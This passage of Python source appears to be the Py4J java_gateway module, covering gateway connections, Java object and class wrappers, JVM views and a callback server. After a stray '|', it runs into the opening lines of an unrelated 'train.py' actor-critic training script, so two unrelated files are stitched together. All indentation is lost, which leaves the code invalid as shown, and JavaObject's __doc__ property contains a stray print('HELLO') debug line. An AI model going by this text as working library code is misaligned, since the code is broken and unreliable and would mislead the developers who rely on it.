:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:rtype: the `string` answer received from the JVM. The answer follows
the Py4J protocol.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
self._give_back_connection(connection)
except Py4JNetworkError:
if retry:
logging.info("Exception while sending command.", exc_info=True)
response = self.send_command(command)
else:
logging.exception(
"Exception while sending command.")
response = proto.ERROR
return response
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, address=DEFAULT_ADDRESS, port=25333, auto_close=True,
gateway_property=None):
"""
:param address: the address to which the connection will be established
:param port: the port to which the connection will be established.
Default is 25333.
:param auto_close: if `True`, the connection closes the socket when it
is garbage collected.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.address = address
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.is_connected = False
self.auto_close = auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.is_connected = True
self.stream = self.socket.makefile("rb", 0)
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server"
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def close(self):
"""Closes the connection by closing the socket."""
quiet_close(self.stream)
quiet_shutdown(self.socket)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if (not self.is_connected):
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM. The answer follows
the Py4J protocol.
"""
logger.debug("Command to send: {0}".format(command))
try:
self.socket.sendall(command.encode("utf-8"))
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
            # Happens when the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
self.close()
raise Py4JError("Answer from Java side is empty")
return answer
except Exception as e:
logger.exception("Error while sending or receiving.")
raise Py4JNetworkError("Error while sending or receiving", e)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
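        # Run non-JavaObject arguments through the registered input converters
        # (e.g. a Python list becomes a Java list); converted temporaries are
        # returned separately so __call__ can detach them after the call.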
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
self._auto_field = gateway_client.gateway_property.auto_field
self._methods = {}
self._field_names = set()
self._fully_populated = False
self._gateway_doc = None
key = smart_decode(self._gateway_client.address) +\
smart_decode(self._gateway_client.port) +\
self._target_id
value = weakref.ref(
self,
lambda wr, cc=self._gateway_client, id=self._target_id:
_garbage_collect_object(cc, id))
ThreadSafeFinalizer.add_finalizer(key, value)
def _detach(self):
_garbage_collect_object(self._gateway_client, self._target_id)
def _get_object_id(self):
return self._target_id
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
print("HELLO")
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __getattr__(self, name):
if name == "__call__":
# Provide an explicit definition for __call__ so that a JavaMember
# does not get created for it. This serves two purposes:
# 1) IPython (and others?) stop showing incorrect help indicating
# that this is callable
# 2) A TypeError(object not callable) is raised if someone does try
# to call here
raise AttributeError
if name not in self._methods:
if (self._auto_field):
(is_field, return_value) = self._get_field(name)
if (is_field):
self._field_names.add(name)
return return_value
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
# The name is a method
return self._methods[name]
def __dir__(self):
self._populate_fields()
return list(set(self._methods.keys()) | self._field_names)
def _populate_fields(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if not self._fully_populated:
if self._auto_field:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_FIELDS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
self._field_names.update(return_value.split("\n"))
command = proto.DIR_COMMAND_NAME +\
proto.DIR_METHODS_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._target_id, "__dir__")
names = return_value.split("\n")
for name in names:
if name not in self._methods:
self._methods[name] = JavaMember(
name, self, self._target_id, self._gateway_client)
self._fully_populated = True
def _get_field(self, name):
command = proto.FIELD_COMMAND_NAME +\
proto.FIELD_GET_SUBCOMMAND_NAME +\
self._target_id + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.NO_MEMBER_COMMAND or is_error(answer)[0]:
return (False, None)
else:
return_value = get_return_value(
answer, self._gateway_client, self._target_id, name)
return (True, return_value)
def __eq__(self, other):
if other is None:
return False
elif (hasattr2(other, "_get_object_id")):
return self.equals(other)
else:
return other.__eq__(self)
def __hash__(self):
return self.hashCode()
def __str__(self):
return self.toString()
def __repr__(self):
# For now...
return "JavaObject id=" + self._target_id
class JavaClass(object):
"""A `JavaClass` represents a Java Class from which static members can be
retrieved. `JavaClass` instances are also needed to initialize an array.
Usually, `JavaClass` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang.String`.
"""
def __init__(self, fqn, gateway_client):
self._fqn = fqn
self._gateway_client = gateway_client
self._pool = self._gateway_client.gateway_property.pool
self._command_header = fqn + "\n"
self._converters = self._gateway_client.converters
self._gateway_doc = None
self._statics = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self._gateway_client, self, display=False)
return self._gateway_doc
def __dir__(self):
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
if self._statics is None:
command = proto.DIR_COMMAND_NAME +\
proto.DIR_STATIC_SUBCOMMAND_NAME +\
self._fqn + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._fqn, "__dir__")
self._statics = return_value.split("\n")
return self._statics[:]
def __getattr__(self, name):
if name in ["__str__", "__repr__"]:
raise AttributeError
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_MEMBER_SUB_COMMAND_NAME +\
self._fqn + "\n" +\
name + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if len(answer) > 1 and answer[0] == proto.SUCCESS:
if answer[1] == proto.METHOD_TYPE:
return JavaMember(
name, None, proto.STATIC_PREFIX + self._fqn,
self._gateway_client)
elif answer[1].startswith(proto.CLASS_TYPE):
return JavaClass(
self._fqn + "$" + name, self._gateway_client)
else:
return get_return_value(
answer, self._gateway_client, self._fqn, name)
else:
raise Py4JError(
"{0}.{1} does not exist in the JVM".format(self._fqn, name))
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self._converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self._gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def __call__(self, *args):
# TODO Refactor to use a mixin shared by JavaMember and JavaClass
if self._converters is not None and len(self._converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self._pool) for arg in new_args])
command = proto.CONSTRUCTOR_COMMAND_NAME +\
self._command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, None, self._fqn)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class UserHelpAutoCompletion(object):
"""
Type a package name or a class name.
For example with a JVMView called view:
>>> o = view.Object() # create a java.lang.Object
>>> random = view.java.util.Random() # create a java.util.Random
The default JVMView is in the gateway and is called:
>>> gateway.jvm
By default, java.lang.* is available in the view. To
add additional Classes/Packages, do:
>>> from py4j.java_gateway import java_import
>>> java_import(gateway.jvm, "com.example.Class1")
>>> instance = gateway.jvm.Class1()
Package and class completions are only available for
explicitly imported Java classes. For example, if you
java_import(gateway.jvm, "com.example.Class1")
then Class1 will appear in the completions.
"""
KEY = "<package or class name>"
class JavaPackage(object):
"""A `JavaPackage` represents part of a Java package from which Java
classes can be accessed.
Usually, `JavaPackage` are not initialized using their constructor, but
they are created while accessing the `jvm` property of a gateway, e.g.,
`gateway.jvm.java.lang`.
"""
def __init__(self, fqn, gateway_client, jvm_id=None):
self._fqn = fqn
self._gateway_client = gateway_client
if jvm_id is None:
    self._jvm_id = proto.DEFAULT_JVM_ID
else:
    self._jvm_id = jvm_id
def __dir__(self):
return [UserHelpAutoCompletion.KEY]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion
if name in ["__str__", "__repr__"]:
raise AttributeError
if name == "__call__":
raise Py4JError("Trying to call a package.")
new_fqn = self._fqn + "." + name
command = proto.REFLECTION_COMMAND_NAME +\
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME +\
new_fqn + "\n" +\
self._jvm_id + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(new_fqn, self._gateway_client, self._jvm_id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(new_fqn))
class JVMView(object):
"""A `JVMView` allows access to the Java Virtual Machine of a
`JavaGateway`.
This can be used to reference static members (fields and methods) and
to call constructors.
"""
def __init__(self, gateway_client, jvm_name, id=None, jvm_object=None):
self._gateway_client = gateway_client
self._jvm_name = jvm_name
if id is not None:
self._id = id
elif jvm_object is not None:
self._id = proto.REFERENCE_TYPE + jvm_object._get_object_id()
# So that both JVMView instances (on Python and Java) have the
# same lifecycle. Theoretically, JVMView could inherit from
# JavaObject, but I would like to avoid the use of reflection
# for regular Py4J classes.
self._jvm_object = jvm_object
self._dir_sequence_and_cache = (None, [])
def __dir__(self):
command = proto.DIR_COMMAND_NAME +\
proto.DIR_JVMVIEW_SUBCOMMAND_NAME +\
self._id + "\n" +\
get_command_part(self._dir_sequence_and_cache[0]) + "\n" +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return_value = get_return_value(
answer, self._gateway_client, self._id, "__dir__")
if return_value is not None:
result = return_value.split("\n")
# Theoretically, not thread safe, but the worst case scenario is
# cache miss or double overwrite of the same method...
self._dir_sequence_and_cache = (
result[0], result[1:] + [UserHelpAutoCompletion.KEY])
return self._dir_sequence_and_cache[1][:]
def __getattr__(self, name):
if name == UserHelpAutoCompletion.KEY:
return UserHelpAutoCompletion()
answer = self._gateway_client.send_command(
proto.REFLECTION_COMMAND_NAME +
proto.REFL_GET_UNKNOWN_SUB_COMMAND_NAME + name + "\n" + self._id +
"\n" + proto.END_COMMAND_PART)
if answer == proto.SUCCESS_PACKAGE:
return JavaPackage(name, self._gateway_client, jvm_id=self._id)
elif answer.startswith(proto.SUCCESS_CLASS):
return JavaClass(
answer[proto.CLASS_FQN_START:], self._gateway_client)
else:
raise Py4JError("{0} does not exist in the JVM".format(name))
class GatewayProperty(object):
"""Object shared by callbackserver, gateway, and connections.
"""
def __init__(self, auto_field, pool):
self.auto_field = auto_field
self.pool = pool
class JavaGateway(object):
"""A `JavaGateway` is the main interaction point between a Python VM and
a JVM.
* A `JavaGateway` instance is connected to a `Gateway` instance on the
Java side.
* The `entry_point` field of a `JavaGateway` instance is connected to
the `Gateway.entryPoint` instance on the Java side.
* The `jvm` field of `JavaGateway` enables user to access classes, static
members (fields and methods) and call constructors.
Methods that are not defined by `JavaGateway` are always redirected to
`entry_point`. For example, ``gateway.doThat()`` is equivalent to
``gateway.entry_point.doThat()``. This is a trade-off between convenience
and potential confusion.
"""
def __init__(
self, gateway_client=None, auto_field=False,
python_proxy_port=DEFAULT_PYTHON_PROXY_PORT,
start_callback_server=False, auto_convert=False, eager_load=False,
gateway_parameters=None, callback_server_parameters=None):
"""
:param gateway_parameters: An instance of `GatewayParameters` used to
configure the various options of the gateway.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
gateway server. Must be provided to start a gateway server.
Otherwise, callbacks won't be available.
"""
self.gateway_parameters = gateway_parameters
if not gateway_parameters:
self.gateway_parameters = GatewayParameters(
auto_field=auto_field, auto_convert=auto_convert,
eager_load=eager_load)
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# No parameters were provided so do not autostart callback server.
self.callback_server_parameters = CallbackServerParameters(
port=python_proxy_port, eager_load=False)
# Check for deprecation warnings
if auto_field:
deprecated("JavaGateway.auto_field", "1.0", "GatewayParameters")
if auto_convert:
deprecated("JavaGateway.auto_convert", "1.0", "GatewayParameters")
if eager_load:
deprecated("JavaGateway.eager_load", "1.0", "GatewayParameters")
if start_callback_server:
deprecated(
"JavaGateway.start_callback_server and python_proxy_port",
"1.0", "CallbackServerParameters")
self.callback_server_parameters.eager_load = True
if gateway_client:
deprecated("JavaGateway.gateway_client", "1.0",
"GatewayParameters")
else:
gateway_client = GatewayClient(
address=self.gateway_parameters.address,
port=self.gateway_parameters.port,
auto_close=self.gateway_parameters.auto_close)
self.gateway_property = GatewayProperty(
self.gateway_parameters.auto_field, PythonProxyPool())
self._python_proxy_port = python_proxy_port
# Setup gateway client
self.set_gateway_client(gateway_client)
# Setup callback server property
self._callback_server = None
if self.gateway_parameters.eager_load:
self._eager_load()
if self.callback_server_parameters.eager_load:
self.start_callback_server(self.callback_server_parameters)
def set_gateway_client(self, gateway_client):
"""Sets the gateway client for this JavaGateway. This sets the
appropriate gateway_property and resets the main jvm view (self.jvm).
This is for advanced usage only and should only be set before the
gateway is loaded.
"""
if self.gateway_parameters.auto_convert:
gateway_client.converters = proto.INPUT_CONVERTER
else:
gateway_client.converters = None
gateway_client.gateway_property = self.gateway_property
self._gateway_client = gateway_client
self.entry_point = JavaObject(
proto.ENTRY_POINT_OBJECT_ID, self._gateway_client)
self.jvm = JVMView(
self._gateway_client, jvm_name=proto.DEFAULT_JVM_NAME,
id=proto.DEFAULT_JVM_ID)
def __getattr__(self, name):
return self.entry_point.__getattr__(name)
def _eager_load(self):
try:
self.jvm.System.currentTimeMillis()
except Exception:
self.shutdown()
raise
def start_callback_server(self, callback_server_parameters=None):
"""Starts the callback server.
:param callback_server_parameters: parameters to use to start the
server. If not provided, it will use the gateway callback server
parameters.
:rtype: Returns True if the server was started by this call or False if
it was already started (you cannot have more than one started
callback server).
"""
if self._callback_server:
return False
if not callback_server_parameters:
callback_server_parameters = self.callback_server_parameters
self._callback_server = CallbackServer(
self.gateway_property.pool, self._gateway_client,
callback_server_parameters=callback_server_parameters)
try:
self._callback_server.start()
except Py4JNetworkError:
# Clean up ourselves before raising the exception.
self.shutdown()
self._callback_server = None
raise
return True
def new_jvm_view(self, name="custom jvm"):
"""Creates a new JVM view with its own imports. A JVM view ensures
that the import made in one view does not conflict with the import
of another view.
Generally, each Python module should have its own view (to replicate
Java behavior).
:param name: Optional name of the jvm view. Does not need to be
unique, i.e., two distinct views can have the same name
(internally, they will have a distinct id).
:rtype: A JVMView instance (same class as the gateway.jvm instance).
"""
command = proto.JVMVIEW_COMMAND_NAME +\
proto.JVM_CREATE_VIEW_SUB_COMMAND_NAME +\
get_command_part(name) +\
proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
java_object = get_return_value(answer, self._gateway_client)
return JVMView(
gateway_client=self._gateway_client, jvm_name=name,
jvm_object=java_object)
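# Sketch of per-module views (added for illustration; the imported class
# names are hypothetical):
#
#   module_a_view = gateway.new_jvm_view("module_a")
#   module_b_view = gateway.new_jvm_view("module_b")
#   java_import(module_a_view, "com.example.a.Parser")
#   java_import(module_b_view, "com.example.b.Parser")
#   parser_a = module_a_view.Parser()   # each view resolves its own import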
def new_array(self, java_class, *dimensions):
"""Creates a Java array of type `java_class` of `dimensions`
:param java_class: The :class:`JavaClass` instance representing the
type of the array.
:param dimensions: A list of dimensions of the array. For example
`[1,2]` would produce an `array[1][2]`.
:rtype: A :class:`JavaArray <py4j.java_collections.JavaArray>`
instance.
"""
if len(dimensions) == 0:
raise Py4JError("new arrays must have at least one dimension")
command = proto.ARRAY_COMMAND_NAME +\
proto.ARRAY_CREATE_SUB_COMMAND_NAME +\
get_command_part(java_class._fqn)
for dimension in dimensions:
command += get_command_part(dimension)
command += proto.END_COMMAND_PART
answer = self._gateway_client.send_command(command)
return get_return_value(answer, self._gateway_client)
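# Example (editorial): creating a 2x3 array of java.lang.String and setting
# one element through the returned JavaArray wrapper:
#
#   string_class = gateway.jvm.java.lang.String
#   array = gateway.new_array(string_class, 2, 3)
#   array[0][0] = "hello"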
def shutdown(self, raise_exception=False):
"""Shuts down the :class:`GatewayClient` and the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._gateway_client.shutdown_gateway()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
self.shutdown_callback_server()
def shutdown_callback_server(self, raise_exception=False):
"""Shuts down the
:class:`CallbackServer <py4j.java_callback.CallbackServer>`.
:param raise_exception: If `True`, raise an exception if an error
occurs while shutting down (very likely with sockets).
"""
try:
self._callback_server.shutdown()
except Exception:
if raise_exception:
raise
else:
logger.info(
"Exception while shutting down callback server",
exc_info=True)
def restart_callback_server(self):
"""Shuts down the callback server (if started) and restarts a new one.
"""
self.shutdown_callback_server()
self._callback_server = None
self.start_callback_server(self.callback_server_parameters)
def close(self, keep_callback_server=False):
"""Closes all gateway connections. A connection will be reopened if
necessary (e.g., if a :class:`JavaMethod` is called).
:param keep_callback_server: if `True`, the callback server is not
shut down.
"""
self._gateway_client.close()
if not keep_callback_server:
self.shutdown_callback_server()
def detach(self, java_object):
"""Makes the Java Gateway dereference this object.
The equivalent of this method is called when a JavaObject instance
is garbage collected on the Python side. This method, or gc.collect()
should still be invoked when memory is limited or when too many objects
are created on the Java side.
:param java_object: The JavaObject instance to dereference (free) on
the Java side.
"""
java_object._detach()
def help(self, var, pattern=None, short_name=True, display=True):
"""Displays a help page about a class or an object.
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get\*Foo" may return getMyFoo, getFoo, getFooBar, but not
bargetFoo. The pattern is matched against the entire signature.
To match only the name of a method, use "methodName(\*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
return gateway_help(
self._gateway_client, var, pattern, short_name, display)
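# Illustration of the pattern argument (added; `my_list` stands for any
# JavaObject, e.g. a java.util.ArrayList):
#
#   gateway.help(my_list, pattern="add*")          # only the add* members
#   page = gateway.help(my_list, display=False)    # return the page as text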
@classmethod
def launch_gateway(
cls, port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=False):
"""Launch a `Gateway` in a new Java process and create a default
:class:`JavaGateway <py4j.java_gateway.JavaGateway>` to connect to
it.
See :func:`launch_gateway <py4j.java_gateway.launch_gateway>` for more
information about this function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the
classpath should be specified using the `classpath` parameter,
not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout.
If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param redirect_stderr: where to redirect the JVM stderr.
If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
:param daemonize_redirect: if True, the consumer threads will be
daemonized and will not prevent the main Python process from
exiting. This means the file descriptors (stderr, stdout,
redirect_stderr, redirect_stdout) might not be properly closed.
This is not usually a problem, but the default is conservatively
set to False.
:rtype: a :class:`JavaGateway <py4j.java_gateway.JavaGateway>`
connected to the `Gateway` server.
"""
_port = launch_gateway(
port, jarpath, classpath, javaopts, die_on_exit,
redirect_stdout=redirect_stdout, redirect_stderr=redirect_stderr,
daemonize_redirect=daemonize_redirect)
gateway = JavaGateway(gateway_parameters=GatewayParameters(port=_port))
return gateway
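# Typical use (an editorial sketch; the Py4J jar is located automatically
# when installed in the usual place):
#
#   gateway = JavaGateway.launch_gateway(die_on_exit=True)
#   millis = gateway.jvm.System.currentTimeMillis()
#   gateway.shutdown()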
# CALLBACK SPECIFIC
class CallbackServer(object):
"""The CallbackServer is responsible for receiving call back connection
requests from the JVM. Usually connections are reused on the Java side,
but there is at least one connection per concurrent thread.
"""
def __init__(
self, pool, gateway_client, port=DEFAULT_PYTHON_PROXY_PORT,
address=DEFAULT_ADDRESS, callback_server_parameters=None):
"""
:param pool: the pool responsible of tracking Python objects passed to
the Java side.
:param gateway_client: the gateway client used to call Java objects.
:param callback_server_parameters: An instance of
`CallbackServerParameters` used to configure various options of the
callback server.
"""
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
deprecated(
"CallbackServer.port and address", "1.0",
"CallbackServerParameters")
self.callback_server_parameters = CallbackServerParameters(
address=address, port=port)
self.port = self.callback_server_parameters.port
self.address = self.callback_server_parameters.address
self.pool = pool
self.connections = []
# Lock is used to isolate critical regions like connection creation.
# Some code can produce exceptions when run in parallel, but
# they will be caught and dealt with.
self.lock = RLock()
self.is_shutdown = False
def start(self):
"""Starts the CallbackServer. This method should be called by the
client instead of run()."""
self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
self.server_socket.bind((self.address, self.port))
except Exception as e:
msg = "An error occurred while trying to start the callback server"
logger.exception(msg)
raise Py4JNetworkError(msg, e)
# Maybe the thread needs to be cleaned up?
self.thread = Thread(target=self.run)
# Default is False
self.thread.daemon = self.callback_server_parameters.daemonize
self.thread.start()
def run(self):
"""Starts listening and accepting connection requests.
This method is called when invoking `CallbackServer.start()`. A
CallbackServer instance is created and started automatically when
a :class:`JavaGateway <py4j.java_gateway.JavaGateway>` instance is
created.
"""
try:
with self.lock:
self.is_shutdown = False
logger.info("Callback Server Starting")
self.server_socket.listen(5)
logger.info(
"Socket listening on {0}".
format(smart_decode(self.server_socket.getsockname())))
read_list = [self.server_socket]
while not self.is_shutdown:
readable, writable, errored = select.select(
read_list, [], [], DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT)
if self.is_shutdown:
break
for s in readable:
socket_instance, _ = self.server_socket.accept()
input = socket_instance.makefile("rb", 0)
connection = CallbackConnection(
self.pool, input, socket_instance, self.gateway_client,
self.callback_server_parameters)
with self.lock:
if not self.is_shutdown:
self.connections.append(connection)
connection.start()
else:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
except Exception:
if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
logger.exception("Error while waiting for a connection.")
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
with self.lock:
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
for connection in self.connections:
quiet_shutdown(connection.socket)
quiet_close(connection.socket)
self.pool.clear()
self.thread.join()
self.thread = None
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
self.callback_server_parameters = CallbackServerParameters()
self.daemon = self.callback_server_parameters.daemonize_connections
def run(self):
logger.info("Callback Connection ready to receive messages")
try:
while True:
command = smart_decode(self.input.readline())[:-1]
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
del(self.pool[obj_id])
else:
logger.error("Unknown command {0}".format(command))
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
logger.info("Closing down connection")
quiet_shutdown(self.socket)
quiet_close(self.socket)
def _call_proxy(self, obj_id, input):
return_message = proto.ERROR_RETURN_MESSAGE
if obj_id in self.pool:
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return_message = "y" +\
get_command_part(return_value, self.pool)
except Exception:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
return return_message
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
train.py
|
"""
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import os
os.environ['OMP_NUM_THREADS'] = '1'
import argparse
import torch
from src.env import create_train_env
from src.model import Mnih2016ActorCritic
AC_NN_MODEL = Mnih2016ActorCritic
